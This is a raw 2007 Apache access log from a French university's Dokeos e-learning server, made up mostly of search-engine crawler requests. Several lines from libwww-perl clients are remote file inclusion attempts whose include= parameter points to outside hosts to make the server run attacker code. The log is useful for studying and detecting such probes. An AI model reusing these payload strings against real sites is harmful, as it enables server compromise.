85.255.119.178 - - [23/Jul/2007:04:49:05 +0200] "GET /erudist/ HTTP/1.1" 206 510 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.255.119.178 - - [23/Jul/2007:04:49:06 +0200] "GET /0;%20URL=http://domus.reseau.fr/erudist HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
207.46.98.30 - - [23/Jul/2007:04:50:25 +0200] "GET /dokeos/iep/whoisonline.php?referer=%2Fdokeos%2Fiep%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fiep%252Fclaroline%252Fphpbb%252Findex.php%253FcidReq%253DCMCHALTIEL HTTP/1.0" 200 3565 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:50:36 +0200] "GET /dokeos/palm/claroline/document/download.php?doc_url=/0.5gerondif1/0.5gerondif1.htm HTTP/1.0" 200 2304 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:50:36 +0200] "GET /dokeos/palm/claroline/document/download.php?doc_url=/0.7bis_form_adj2.htm HTTP/1.0" 200 2293 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:50:36 +0200] "GET /dokeos/palm/claroline/document/download.php?doc_url=/intro_module0_MethodNum.htm HTTP/1.0" 200 2300 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:50:38 +0200] "GET /dokeos/palm/claroline/document/download.php?doc_url=/video_dendievel/intro_ecouteglobale_MethodNum.htm HTTP/1.0" 200 2324 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.30 - - [23/Jul/2007:04:51:11 +0200] "GET /dokeos/stendhal/whoisonline.php?referer=%2Fdokeos%2Fstendhal%2Fwhoisonline.php%3Fid%3D2387 HTTP/1.0" 200 3178 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:04:51:22 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fujf%252Fclaroline%252Flink%252Flink.php%253Furlview%253D00100000000 HTTP/1.0" 200 3262 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:04:52:09 +0200] "GET /dokeos/cuef/claroline/link/link.php?cidReq=PHONETIQUE HTTP/1.0" 200 4540 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.32 - - [23/Jul/2007:04:53:33 +0200] "GET /dokeos/cuef/claroline/document/headerpage.php?file=%2Fautresnominalis.htm HTTP/1.0" 200 2372 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
68.142.212.161 - - [23/Jul/2007:04:53:53 +0200] "GET /dokeos/inpg/courses/VALETACCLIB/document/site/puce.gif HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)"
65.55.208.245 - - [23/Jul/2007:04:54:14 +0200] "GET /dokeos/ujf/claroline/link/link.php?urlview=00001000000000 HTTP/1.0" 200 2288 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:54:17 +0200] "GET /dokeos/gu/claroline/user/userInfo.php?origin=&uInfo=124 HTTP/1.0" 200 2347 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:54:18 +0200] "GET /dokeos/palm/claroline/document/document.php?action=download&id=%2Ffichaid_sq4_MethodNum.doc HTTP/1.0" 200 2315 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:54:22 +0200] "GET /dokeos/cuef/claroline/document/download.php?doc_url=/weblingua4/index.html HTTP/1.0" 200 2361 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.30 - - [23/Jul/2007:04:55:32 +0200] "GET /dokeos/cuef/claroline/learnpath/learnpath_handler.php?learnpath_id=1&chapter_id=5&action=add&type=learnpathitem HTTP/1.0" 200 2406 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
85.114.133.27 - - [23/Jul/2007:04:55:46 +0200] "GET /dokeos/upmf/index.php?include=-_french.html/index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 9748 "-" "libwww-perl/5.805"
85.114.133.27 - - [23/Jul/2007:04:55:46 +0200] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
85.114.133.27 - - [23/Jul/2007:04:55:46 +0200] "GET /dokeos/upmf/index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 9748 "-" "libwww-perl/5.805"
74.6.69.11 - - [23/Jul/2007:04:56:05 +0200] "GET /dokeos/ujf/?category=Meca HTTP/1.0" 200 12898 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.142.212.161 - - [23/Jul/2007:04:56:14 +0200] "GET /dokeos/inpg/courses/VALETACCLIB/document/site/logo_RA.gif HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)"
65.55.208.245 - - [23/Jul/2007:04:56:20 +0200] "GET /dokeos/gu/whoisonline.php?referer=%2Fdokeos%2Fgu%2Fclaroline%2Fwork%2Fwork.php%3FcidReq%3DDOKEOSAT HTTP/1.0" 200 3283 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:56:24 +0200] "GET /dokeos/palm/claroline/document/download.php?doc_url=/8.3definition.htm HTTP/1.0" 200 2290 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:56:26 +0200] "GET /dokeos/palm/claroline/document/download.php?doc_url=/1.cloture_pnotes_MethodNum.htm HTTP/1.0" 200 2303 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
66.249.65.171 - - [23/Jul/2007:04:56:42 +0200] "GET /dokeos/ujf/logincas.php HTTP/1.1" 302 437 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.245 - - [23/Jul/2007:04:56:47 +0200] "GET /dokeos/upmf/courses/L2INFON1/document/mdp.txt?cidReq=L2INFON1 HTTP/1.0" 200 8 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:58:12 +0200] "GET /robots.txt HTTP/1.0" 404 288 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:58:12 +0200] "GET /dokeos/ujf/claroline/document/document.php?origin=&column=0&direction=3&page_nr=1&per_page=100&curdirpath=%2Fdocuments_travail HTTP/1.0" 200 2379 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:58:14 +0200] "GET /dokeos/cuef/whoisonline.php?referer=%2Fdokeos%2Fcuef%2Fclaroline%2Flearnpath%2Flearnpath_handler.php%3Flearnpath_id%3D5%26cidReq%3DCL7a30 HTTP/1.0" 200 3527 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:58:14 +0200] "GET /dokeos/cuef/whoisonline.php?referer=%2Fdokeos%2Fcuef%2Fclaroline%2Fdocument%2Fdocument.php%3Faction%3Ddownload%26id%3D%252Ftableau_contenus_reflet2.rtf HTTP/1.0" 200 3555 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:58:15 +0200] "GET /dokeos/cuef/whoisonline.php?referer=%2Fdokeos%2Fcuef%2Fclaroline%2Fdocument%2Fdocument.php%3Faction%3Ddownload%26id%3D%252Fextra.pdf HTTP/1.0" 200 3517 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.243 - - [23/Jul/2007:05:00:12 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fujf%252Fwhoisonline.php%253Fid%253D1330 HTTP/1.0" 200 3206 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.27.11 - - [23/Jul/2007:05:00:21 +0200] "GET /dokeos/upmf/whoisonline.php?id=2128 HTTP/1.0" 200 2937 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.24.36 - - [23/Jul/2007:05:00:41 +0200] "GET /dokeos_cuef/claroline/document/document.php?action=download&id=%2FOutils_de_creation%2FDreamWeaver_MX%2Fprise_en_main__DreamweaverMX.doc HTTP/1.0" 404 321 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.243 - - [23/Jul/2007:05:02:17 +0200] "GET /robots.txt HTTP/1.0" 404 288 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.243 - - [23/Jul/2007:05:02:17 +0200] "GET /dokeos/stendhal/claroline/document/document.php?action=downloadfolder&path=%2FSemestre_6%2FCours_de_Sociolinguistique%2FChapitre_3_Sociolinguistique_qualitative HTTP/1.0" 200 2471 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.243 - - [23/Jul/2007:05:02:19 +0200] "GET /dokeos/stendhal/claroline/document/document.php?action=downloadfolder&path=%2FSemestre_3%2Fparcours_informatique_et_langues%2F1%29Algorithmique_et_programmation HTTP/1.0" 200 2473 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
68.142.212.161 - - [23/Jul/2007:05:02:21 +0200] "GET /dokeos/inpg/courses/VALETACCLIB/document/site/cellule_tice.gif HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)"
68.142.212.161 - - [23/Jul/2007:05:02:47 +0200] "GET /dokeos/inpg/courses/VALETACCLIB/document/site/logo_blanc_edit.gif HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)"
74.6.22.213 - - [23/Jul/2007:05:03:09 +0200] "GET /cartotice/index?page=technique HTTP/1.0" 404 293 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.24.229 - - [23/Jul/2007:05:03:49 +0200] "GET /dokeos/edaf/courses/ACCESLIBRE/document/Outilslinguistiques.doc_DELETED_56 HTTP/1.0" 200 27648 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.114.133.27 - - [23/Jul/2007:05:05:49 +0200] "GET /dokeos/upmf/index.php?include=-_french.html/index.php?include=http://geocities.com/nadira_sekseh/log.txt? HTTP/1.1" 200 9748 "-" "libwww-perl/5.805"
85.114.133.27 - - [23/Jul/2007:05:05:50 +0200] "GET /index.php?include=http://geocities.com/nadira_sekseh/log.txt? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
85.114.133.27 - - [23/Jul/2007:05:05:50 +0200] "GET /dokeos/upmf/index.php?include=http://geocities.com/nadira_sekseh/log.txt? HTTP/1.1" 200 9748 "-" "libwww-perl/5.805"
207.46.98.30 - - [23/Jul/2007:05:06:01 +0200] "GET /dokeos/gu/whoisonline.php?referer=%2Fdokeos%2Fgu%2Fcourses%2FLEA001%2Findex.php HTTP/1.0" 200 3245 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
66.249.65.171 - - [23/Jul/2007:05:06:47 +0200] "GET /dokeos/upmf/claroline/document/document.php?origin=&column=4&direction=3&page_nr=1&per_page=100&curdirpath=%2Femployabilit%E9 HTTP/1.1" 200 2125 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.243 - - [23/Jul/2007:05:07:17 +0200] "GET /dokeos/stendhal/claroline/phpbb/reply.php?topic=25&forum=3 HTTP/1.0" 200 2377 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.243 - - [23/Jul/2007:05:07:17 +0200] "GET /dokeos/iep/claroline/phpbb/reply.php?topic=16&forum=3 HTTP/1.0" 200 2371 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.243 - - [23/Jul/2007:05:07:20 +0200] "GET /dokeos/stendhal/claroline/document/document.php?action=download&id=%2FSemestre_5%2FTronc_commun%2F1%29phonologie%2Fspectros_12_11_etudiants.ppt HTTP/1.0" 200 2458 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.243 - - [23/Jul/2007:05:07:22 +0200] "GET /dokeos/stendhal/claroline/phpbb/reply.php?topic=12&forum=3&parentid=23 HTTP/1.0" 200 2393 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
83.16.15.42 - - [23/Jul/2007:05:09:46 +0200] "GET /dokeos/upmf/index.php?include=-_french.html/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 200 9748 "-" "libwww-perl/5.805"
65.55.208.243 - - [23/Jul/2007:05:11:14 +0200] "GET /dokeos/gu/claroline/phpbb/reply.php?topic=2&forum=6&parentid=14 HTTP/1.0" 200 2373 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.243 - - [23/Jul/2007:05:11:15 +0200] "GET /dokeos/iep/whoisonline.php?id=2788 HTTP/1.0" 200 3097 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.68.213 - - [23/Jul/2007:05:11:25 +0200] "GET /erudist/ressources.php?idce=62 HTTP/1.0" 404 300 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.142.212.161 - - [23/Jul/2007:05:12:10 +0200] "GET /dokeos/palm/courses/INFUSAGE/document/module/img/fleche_titre_contenu.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)"
74.6.20.13 - - [23/Jul/2007:05:14:03 +0200] "GET /dokeos/palm/courses/FLESCIENCES/index.php HTTP/1.0" 200 4222 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.98.31 - - [23/Jul/2007:05:14:33 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fclaroline%2Fdocument%2Fdocument.php%3FcidReq%3DMEC360%26curdirpath%3D%252Flinked_files HTTP/1.0" 200 3212 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:05:16:02 +0200] "GET /dokeos/palm/claroline/exercice/exercice_submit.php?origin=builder&exerciseId=43 HTTP/1.0" 200 105 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.23.208 - - [23/Jul/2007:05:16:14 +0200] "GET /dokeos/palm/claroline/document/ HTTP/1.0" 200 108 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.23.208 - - [23/Jul/2007:05:16:15 +0200] "GET /dokeos/palm/claroline/document/document.php HTTP/1.0" 200 2257 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.65.171 - - [23/Jul/2007:05:16:59 +0200] "GET /dokeos/edaf/claroline/document/headerpage.php?file=%2Fmethodo_htm_files%2Fguidoct.htm HTTP/1.1" 200 2629 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.54.188.109 - - [23/Jul/2007:05:17:06 +0200] "GET /robots.txt HTTP/1.0" 404 288 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.54.188.109 - - [23/Jul/2007:05:17:06 +0200] "GET /dokeos/gu/courses/RBA/document/example_math.pdf?cidReq=RBA HTTP/1.0" 200 66983 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.30 - - [23/Jul/2007:05:18:50 +0200] "GET /dokeos/ujf/whoisonline.php?id=1587 HTTP/1.0" 200 2976 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.30 - - [23/Jul/2007:05:18:50 +0200] "GET /dokeos/ujf/whoisonline.php?id=1279 HTTP/1.0" 200 2794 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.32 - - [23/Jul/2007:05:19:16 +0200] "GET /index.php HTTP/1.0" 404 287 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.30 - - [23/Jul/2007:05:19:33 +0200] "GET /dokeos/gu/whoisonline.php?referer=%2Fdokeos%2Fgu%2Fclaroline%2Fcalendar%2Fagenda.php%3FcidReq%3DCL3a1c HTTP/1.0" 200 3291 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.22.15 - - [23/Jul/2007:05:20:33 +0200] "GET /dokeos/palm/claroline/document/document.php?curdirpath=/video_-_Introduction_a_la_gestion_de_projet& HTTP/1.0" 200 2322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.98.30 - - [23/Jul/2007:05:21:38 +0200] "GET /dokeos/iep/whoisonline.php?referer=%2Fdokeos%2Fiep%2Fclaroline%2Fphpbb%2Findex.php%3FcidReq%3DCMCHALTIEL HTTP/1.0" 200 3445 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.17.165 - - [23/Jul/2007:05:22:12 +0200] "GET /dokeos/iep/ HTTP/1.0" 200 8984 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.98.30 - - [23/Jul/2007:05:23:36 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Findex.php%3Fcategory%3DPHARMA%26announcement%3D3 HTTP/1.0" 200 3136 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:05:23:37 +0200] "GET /dokeos/gu/whoisonline.php?referer=%2Fdokeos%2Fgu%2Fclaroline%2Fscorm%2Fscormdocument.php%3FcidReq%3DTEST47fe%26subdirs%3Dyes%26openDir%3D%252FB4tab%252F_lFRE HTTP/1.0" 200 3401 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.30 - - [23/Jul/2007:05:24:42 +0200] "GET /dokeos/palm/claroline/document/download.php?doc_url=/9.2lexiq_adverb.htm HTTP/1.0" 200 2292 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.250 - - [23/Jul/2007:05:24:43 +0200] "GET /robots.txt HTTP/1.0" 404 288 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.250 - - [23/Jul/2007:05:24:43 +0200] "GET /dokeos/iep/whoisonline.php?referer=%2Fdokeos%2Fiep%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fiep%252Fwhoisonline.php%253Fid%253D3 HTTP/1.0" 200 3503 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
66.249.65.171 - - [23/Jul/2007:05:26:59 +0200] "GET /dokeos/palm/courses/DEMOGESTPROJ/document/video_-_Introduction_a_la_gestion_de_projet/intro.htm?cidReq=DEMOGESTPROJ&rand=425 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.250 - - [23/Jul/2007:05:27:11 +0200] "GET /dokeos/inpg/claroline/learnpath/contents.php?menu=my_status&source_id=5&learnpath_id=34&chapter_id=&originalresource=no&fs= HTTP/1.0" 200 580 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.68.78 - - [23/Jul/2007:05:27:21 +0200] "GET /dokeos/upmf/courses/DEV0006/ HTTP/1.0" 200 3513 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.98.32 - - [23/Jul/2007:05:29:54 +0200] "GET /dokeos/stendhal/whoisonline.php?referer=%2Fdokeos%2Fstendhal%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fstendhal%252Fwhoisonline.php%253Fid%253D2092 HTTP/1.0" 200 3300 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.25.118 - - [23/Jul/2007:05:31:36 +0200] "GET /dokeos/palm/claroline/ HTTP/1.0" 200 99 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.25.118 - - [23/Jul/2007:05:31:37 +0200] "GET /dokeos/palm/ HTTP/1.0" 200 7807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.98.31 - - [23/Jul/2007:05:33:39 +0200] "GET /dokeos/gu/claroline/scorm/scormdocument.php?cidReq=TEST47fe&subdirs=yes&openDir=%2FB2%2Fmeta HTTP/1.0" 200 4559 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
66.249.65.171 - - [23/Jul/2007:05:37:00 +0200] "GET /dokeos/palm/claroline/learnpath/learnpath_handler.php?learnpath_id=6&cidReq=MICSTRUC HTTP/1.1" 200 8524 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.252 - - [23/Jul/2007:05:39:12 +0200] "GET /robots.txt HTTP/1.0" 404 288 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.252 - - [23/Jul/2007:05:39:12 +0200] "GET /dokeos/inpg/claroline/learnpath/contents.php?menu=my_status&source_id=5&learnpath_id=67&chapter_id=&originalresource=no&fs= HTTP/1.0" 200 580 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"